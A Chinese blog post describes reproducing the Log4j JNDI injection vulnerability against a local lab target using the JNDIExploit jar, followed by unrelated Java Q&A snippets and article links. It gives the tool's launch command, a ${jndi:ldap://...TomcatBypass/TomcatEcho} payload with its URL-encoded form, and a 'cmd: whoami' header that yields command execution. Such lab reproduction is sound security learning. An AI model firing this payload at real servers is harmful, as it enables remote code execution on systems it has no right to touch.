程序员经验分享-hwhale

JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

2023-10-30

1.首先搭建log4j靶场
在这里插入图片描述
在这里插入图片描述

2.开启服务
Windows攻击端执行以下命令
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1
在这里插入图片描述

再开一个cmd可以看下能用什么payload
java -jar JNDIExploit-1.2-SNAPSHOT.jar -u
在这里插入图片描述

以上payload都可以尝试,我们使用
ldap://null:1389/TomcatBypass/TomcatEcho
3.构造请求
${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}
转成URL
%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D
4.开启bp
请求包中增加cmd:whoami
在这里插入图片描述

执行后发现命令可以执行
在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

jar

Log4j

Java

JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用 的相关文章

  • Android:java.lang.OutOfMemoryError:

    我在 Android 上开发了一个使用大量图像的应用程序 可绘制文件夹中有很多图像 比如说超过 100 张 我正在开发图像动画应用程序 我使用 imageview 来显示 GIF 图像 我使用了将 gif 图像分割成多个 PNG 格式图像的

  • 在 String 值之后打印 int 值

    我有以下示例代码 int pay 80 int bonus 65 System out println pay bonus bonus pay 有人可以向我解释一下为什么我得到以下输出 145 6580 您的代码正在从左到右解释表达式 pa

  • Java,顺序流在哪个线程中执行?

    在阅读有关流的文档时 我遇到了以下句子 attempting to access mutable state from behavioral parameters presents you with a bad choice if you

  • 是否可以使用 Java 读写 Parquet,而不依赖 Hadoop 和 HDFS?

    我一直在寻找这个问题的解决方案 在我看来 如果不引入对 HDFS 和 Hadoop 的依赖 就无法在 Java 程序中嵌入读写 Parquet 格式 它是否正确 我想在 Hadoop 集群之外的客户端计算机上进行读写 我开始对 Apache

  • java 中的梵文 i18n

    我正在尝试使用来自互联网的示例 ttf 文件在 java 中使用 i18n 进行梵文 印地文 我可以加载资源包条目 还可以加载 ttf 并设置字体 但它不会根据需要呈现 jlabel 它显示块代替字符 如果我在 Eclipse 中调试 我可

  • Java 小程序在 Mac 上闪烁

    这个问题很奇怪 问题并非在每个平台上都会发生 我在使用 MacOSX 的 Google Chrome 中出现了这种情况 但在 Safari 中却没有出现这种情况 对于使用 Windows 的朋友来说 在 Google Chrome 上运行得

  • Apache Thrift Java-Javascript 通信

    我正在编写一个基于 Apache Thrift 的 Java 服务器 它将从 Javascript 客户端接收数据 我已经完成了 Java 服务器 但问题是我可以获得 Javascript 客户端的工作示例 我无法找到一个好的示例 构建文档

  • 为什么通过 方法向 List 添加元素(类型正确)会出现编译错误? [复制]

    这个问题在这里已经有答案了 我对泛型通配符概念几乎没有疑问 1 假设我有一个方法 void write List

  • 使用全局变量从内部函数获取空字符串

    请帮助我解决一些小问题 我确信你能做到 D 我试图在 firestore 文档 user cases information 上设置一个字段 其中包含一个字段 case number 首先我声明这个全局变量 private String c

  • FileObserver 不适用于 Android 6.0 Marshmallow (API 23) 中的外部存储

    我有一个应用程序可以观察外部存储上的公共目录FileObserver 它运行良好Lollipop设备 我想添加对Marshmallow 所以我用它设置了一台 Nexus 9 平板电脑 在 Marshmallow 设备上 它失败 在 Loll

  • log4j-extras MaxBackupIndex 或类似的

    我正在使用 log4j extras 1 2 17 org apache log4j rolling RollingFileAppender with a org apache log4j rolling TimeBasedRollingP

  • Java 中如何验证字符串的格式是否正确

    我目前正在用 Java 编写一个验证方法来检查字符串是否是要更改为日期的几种不同格式之一 我希望它接受的格式如下 MM DD YY M DD YY MM D YY 和 M D YY 我正在测试第一种格式 每次它都告诉我它无效 即使我输入了有

  • 如何在Netbeans中设置JList的ListModel?

    我在 Netbeans IDE 的帮助下设计了一个 Swing GUI 该 GUI 包含一个 JList 默认情况下 它使用 QAbstractListModel 将其作为 JList 构造函数中的参数传递以创建该 JList 我想在 Ne

  • 避免 @Secured 注释的重复值

    我正在尝试使用以下方法来保护我的服务方法 Secured如下 public interface IUserService Secured ROLE ROLE1 ROLE ROLE2 ResponseEntity saveUser Creat

  • 使用 Guava Ordering 对对象列表进行多条件排序

    我有一个类无法实现可比较 但需要根据 2 个字段进行排序 我怎样才能用番石榴实现这一目标 假设班级是 class X String stringValue java util Date dateValue 我有一个清单 List

  • Java 8 方法签名不一致

    Java 8 为我们提供了具有很长签名的新方法 如下所示 static

  • 如何使用eclipse调试JSP tomcat服务?

    我想使用 Eclipse IDE 调试器来调试单独运行的 JSP Struts Tomcat Hibernate 应用程序堆栈 如何设置 java JVM 和 eclipse 以便设置断点 监视变量值并查看当前正在执行的代码 我刚刚用谷歌搜

  • 检查按钮是否可用?如果没有,请等待 5 秒钟,然后再次检查?

    基本上我想看看此刻是否可以单击按钮 如果没有我想再试一次 所以我需要某种 goto 函数来返回到代码的前一行 尽管我怀疑我写得非常糟糕 但它本来可以做得更容易 try driver findElement By xpath button i

  • java Web应用程序中的日期转换

    String date1 13 03 2014 16 56 46 AEDT SimpleDateFormat sdf new SimpleDateFormat dd MM yyyy HH mm ss z sdf setTimeZone Ti

  • 我怎样才能限定我不“拥有”的自动装配设置器

    要点是 Spring Batch v2 测试框架具有JobLauncherTestUtils setJob与 Autowired注解 我们的测试套件有多个Job类提供者 由于这个类不是我可以修改的东西 我不确定如何限定它自动连接的作业 每个

随机推荐

  • 机器学习笔记十二:分类与回归树CART

    更新时间 2017 11 18 简化语言 更加通俗 实现 实现部分采用的数据集是机器学习实战中的数据集 代码则是按照自己的理解重新改写了一遍 读取数据模块 data py import numpy as np def loadData fi

  • JAVA中如何写注释

    文章目录 0 写在前面 1 格式 2 演示 2 1 单行注释 2 2 多行注释 2 3 生成文档注释 3 写在最后 0 写在前面 一段良好的代码应该有注释 这样可以使不同的创作者或者阅读者进行良好的阅读 与大多数程序设计语言一样 Java

  • 统信桌面操作系统产线总经理王耀华:深度开源社区的十五年运营路

    深度 deepin 社区是以桌面操作系统为主的开源社区 已经持续运营15年 有接近13万的注册用户 全球下载超过8000万 海外超过300万 并基于deepin衍生出ubuntuDDE manjaro deepin等多个发行版本 2022

  • 错题本 - 机器学习

    下面关于支持向量机 SVM 的描述错误的是 A 是一种监督式学习的方法 B 可用于多分类的问题 C 是一种生成式模型 D 支持非线性的核函数 答案 C 解析 SVM是判别式模型 SVM 支持向量机 SVM 是一类按监督学习方式对数据进行二元

  • File,FileInputStream,FileReader,InputStreamReader,BufferReader 的区别使用

    File 类介绍 File 类封装了对用户机器的文件系统进行操作的功能 例如 可以用 File 类获得文件上次修改的时间 移动 或者对文件进行删除 重命名 换句话说 流类关注的是文件内容 而 File 类关注的是文件在磁盘上的存储 主要方法

  • 使用jsp获取页面的访问ip地址并统计访问量

    jsp获取页面的访问ip地址并统计访问量 考虑到ip地址是唯一不重复的 可以使用set集合来放置ip 然后用set size 得到ip的数量 话不多说 代码在下面

  • 毕业项目SSM框架配置文件之web.xml

  • 【AIGC】AI-Agents最新成果-斯坦福AI小镇源码解读

    写在前面的话 今年年初斯坦福和谷歌的研究人员创建了一个类似于 模拟人生 的微型 RPG 虚拟世界 其中 25 个角色由 GPT 和自定义代码控制 并在arxiv上提交了论文版本 引起了对AIGC 游戏的广泛讨论 8月 该项目在GitHub上

  • TensorFlow2 Fashion-MNIST图像分类(一)

    1 数据集介绍 FashionMNIST 是一个替代 MNIST 手写数字集的图像数据集 它是由 Zalando 一家德国的时尚科技公司 旗下的研究部门提供 其涵盖了来自 10 种类别的共 7 万个不同商品的正面图片 FashionMNIS

  • linux网卡驱动更换,Ubuntu更换网卡驱动

    由于Ubuntu自带的网卡驱动并不一定十分适合自己电脑的网卡 可能会出现插入网线后响应慢的情况 所以可以手动更换Ubuntu的网卡驱动 此处更换以我自己电脑上网卡为例 我的网卡是Realtek生产的 以下是具体过程 1 ifconfig a

  • 一条十几秒的Tik Tok视频月变现9w,2022年还得是短视频来钱快

    大家好 我是项柚 95后社畜一枚 之前辛辛苦苦给老板打一个月苦工 还没我现在做短视频带来的收益高 仅代表个人收益 从一个不怎么冲浪连抖音都懒得刷的门外汉 短短一个多月 一次性还清了自己的银行卡贷款 4个月攒出来某市中心30w房子的首付 原来

  • python中chr函数是什么意思_ord函数和chr函数

    ord函数 order 返回一个字符对应的unicode编码 而chr函数 char 正好反过来 它返回一个unicode编码对应的字符 他们都是python内置函数 为什么是unicode 因为unicode长度统一 都是2个byte 非

  • F - Shifting String(置换的阶+思维)

    前置知识 轮换求置换的阶 例如 由1 2 3 4 5 变为 1 3 2 5 4可以写出其两个转换 1 3 2 4 5 在同一个转换中的数字经过循环可以回到他们对应的原位置 置换的阶即为所有轮换阶数的最小公倍数 lcm 一组数据的最小公倍数

  • Python opencv学习-2读取视频,存视频,设置视频大小

    test2 各种通道读取视频 摄像头 url 视频文件 存视频 设置视频大小等 import numpy as np import cv2 视频来源为摄像头 cap cv2 VideoCapture 0 视频来源为视频文件 cap cv2

  • 技术详解 阿里云AIoT物模型支撑设备规模已超亿级——设备管理运维类

    物模型技术对于物联网企业来说是一项非常重要的技术 因为要实现万物互联 必须要有物模型体系沉淀 才能够让各种硬件产品实现真正的智能化连接 对于阿里云AIoT来说 物模型技术早已完成了多年的沉淀 目前 阿里云AIoT物模型技术已成为行业的引领者

  • 前端h5与 android/ios 交互传参

    介绍 前端 与 Android iOS 交互的代码 双方要约定一个公用的方法 1 与Android交互 前端 调用 Android 的方法 这里将约定的方法名为 HtmlToAndroid window android HtmlToAndr

  • 随笔:@Async注解

    记录 Async使用方法以及遇到的问题 1 在启动类使用 EnableAsync SpringBootApplication EnableAsync public class AsyncApplication public static v

  • 虚拟机安装宝塔后,站点域名无法访问

    1 虚拟机右键 设置 2 网络适配器 选择桥接模式 桥接模式支持别人访问 nat模式仅支持自己访问 3 重启虚拟机 或者重启网卡 4 ifconfig指令获取下对外可以访问的IP 如图中 172 16 5 114 5 宝塔配置一下域名 域名

  • Pytorch BrokenPipeError: [Errno 32] Broken pipe

    今天运行Pytorch出现Broken pipe错误 通过修改torch utils data DataLoader 函数中的 num workers 参数 解决 可能是因为windows对多线程的支持不是很好的原因吧 出错 修改后 默认n

  • JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

    1 首先搭建log4j靶场 2 开启服务 Windows攻击端执行以下命令 java jar JNDIExploit 1 2 SNAPSHOT jar l 8888 p 9999 i 127 0 0 1 再开一个cmd可以看下能用什么pay

热门标签